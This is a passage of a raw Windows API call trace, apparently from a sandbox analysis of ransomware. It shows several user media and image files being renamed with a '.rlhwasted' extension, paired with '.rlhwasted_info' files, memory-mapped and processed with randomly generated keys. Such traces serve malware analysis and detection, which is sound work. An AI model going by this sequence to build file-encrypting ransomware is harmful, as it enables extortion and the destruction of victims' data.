(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kwiTjUo.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kwitjuo.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0187.173] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0187.173] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x14bfd [0187.173] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14bfd) returned 0xb00000 [0187.173] CloseHandle (hObject=0x108) returned 1 [0187.179] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x711070) returned 1 [0187.180] CryptGenRandom (in: hProv=0x711070, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0187.180] CryptReleaseContext (hProv=0x711070, dwFlags=0x0) returned 1 [0187.180] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x711070) returned 1 [0187.181] CryptGenRandom (in: hProv=0x711070, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.181] CryptReleaseContext (hProv=0x711070, dwFlags=0x0) returned 1 [0187.189] SetEndOfFile (hFile=0x128) returned 1 [0187.192] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.192] CloseHandle (hObject=0x128) returned 1 [0187.194] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.194] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eff48 | out: hHeap=0x6b0000) returned 1 [0187.195] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x711070) returned 1 [0187.196] CryptGenRandom (in: hProv=0x711070, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.196] CryptReleaseContext (hProv=0x711070, dwFlags=0x0) returned 1 [0187.196] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MM-xJdEZ.flv") returned 54 [0187.199] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x276) returned 0x6ee458 [0187.199] lstrcpyW (in: lpString1=0x6ee4c4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.199] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0187.199] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0187.200] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0187.200] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MM-xJdEZ.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mm-xjdez.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.201] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.203] SetEndOfFile (hFile=0x124) returned 1 [0187.203] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.203] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.203] lstrcpyW (in: lpString1=0x6ee4c4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MM-xJdEZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mm-xjdez.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MM-xJdEZ.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mm-xjdez.flv.rlhwasted")) returned 1 [0187.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MM-xJdEZ.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mm-xjdez.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.204] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0187.204] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x12b64 [0187.204] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12b64) returned 0xb00000 [0187.204] CloseHandle (hObject=0x128) returned 1 [0187.209] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0187.210] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.210] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.210] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0187.211] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.211] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.220] SetEndOfFile (hFile=0x124) returned 1 [0187.222] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.222] CloseHandle (hObject=0x124) returned 1 [0187.224] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.224] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f00d8 | out: hHeap=0x6b0000) returned 1 [0187.225] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0187.225] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.225] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.225] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\Cgi7U9czV8.bmp") returned 80 [0187.226] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0187.226] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.226] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0187.226] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0187.226] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0187.226] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\Cgi7U9czV8.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\cgi7u9czv8.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.227] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.228] SetEndOfFile (hFile=0x124) returned 1 [0187.228] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.228] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.228] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\Cgi7U9czV8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\cgi7u9czv8.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\Cgi7U9czV8.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\cgi7u9czv8.bmp.rlhwasted")) returned 1 [0187.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\Cgi7U9czV8.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\cgi7u9czv8.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0187.229] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0187.229] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x5aff [0187.229] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aff) returned 0x6a0000 [0187.230] CloseHandle (hObject=0x10c) returned 1 [0187.232] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0187.233] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.233] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.233] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0187.234] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.234] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.276] SetEndOfFile (hFile=0x124) returned 1 [0187.279] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.279] CloseHandle (hObject=0x124) returned 1 [0187.281] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0187.281] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efb48 | out: hHeap=0x6b0000) returned 1 [0187.281] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0187.282] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.282] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.282] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\JAxd0jQpNI9tOy.bmp") returned 84 [0187.283] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x6ee458 [0187.283] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.283] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.283] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0187.284] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.284] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\JAxd0jQpNI9tOy.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\jaxd0jqpni9toy.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.284] WriteFile (in: hFile=0x124, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.286] SetEndOfFile (hFile=0x124) returned 1 [0187.286] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.286] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.286] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\JAxd0jQpNI9tOy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\jaxd0jqpni9toy.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\JAxd0jQpNI9tOy.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\jaxd0jqpni9toy.bmp.rlhwasted")) returned 1 [0187.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\JAxd0jQpNI9tOy.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\jaxd0jqpni9toy.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0187.287] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0187.287] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xbda7 [0187.288] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbda7) returned 0xb00000 [0187.288] CloseHandle (hObject=0x104) returned 1 [0187.294] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0187.295] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.295] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.295] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0187.296] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.296] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.307] SetEndOfFile (hFile=0x124) returned 1 [0187.310] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.310] CloseHandle (hObject=0x124) returned 1 [0187.312] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.312] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fc808 | out: hHeap=0x6b0000) returned 1 [0187.312] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0187.313] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.313] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.313] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\KxMlY.swf") returned 75 [0187.313] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a0) returned 0x6ee458 [0187.313] lstrcpyW (in: lpString1=0x6ee4ee, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.314] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.314] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0187.315] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.315] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\KxMlY.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\kxmly.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.315] WriteFile (in: hFile=0x124, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.317] SetEndOfFile (hFile=0x124) returned 1 [0187.317] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.317] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.317] lstrcpyW (in: lpString1=0x6ee4ee, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\KxMlY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\kxmly.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\KxMlY.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\kxmly.swf.rlhwasted")) returned 1 [0187.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\KxMlY.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\kxmly.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0187.318] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0187.318] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x495e [0187.318] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x495e) returned 0xb00000 [0187.341] CloseHandle (hObject=0x110) returned 1 [0187.344] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0187.345] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.345] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.345] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0187.346] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.346] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.356] SetEndOfFile (hFile=0x124) returned 1 [0187.382] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.382] CloseHandle (hObject=0x124) returned 1 [0187.384] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.384] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fc910 | out: hHeap=0x6b0000) returned 1 [0187.385] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0187.385] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.386] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ftujisaYr n-gmxOqY.mp4") returned 82 [0187.386] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x70cfe8 [0187.386] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.386] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.386] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0187.387] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.387] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ftujisaYr n-gmxOqY.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\ftujisayr n-gmxoqy.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.387] WriteFile (in: hFile=0x124, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.388] SetEndOfFile (hFile=0x124) returned 1 [0187.389] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.389] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.389] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ftujisaYr n-gmxOqY.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\ftujisayr n-gmxoqy.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ftujisaYr n-gmxOqY.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\ftujisayr n-gmxoqy.mp4.rlhwasted")) returned 1 [0187.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ftujisaYr n-gmxOqY.mp4.rlhwasted" 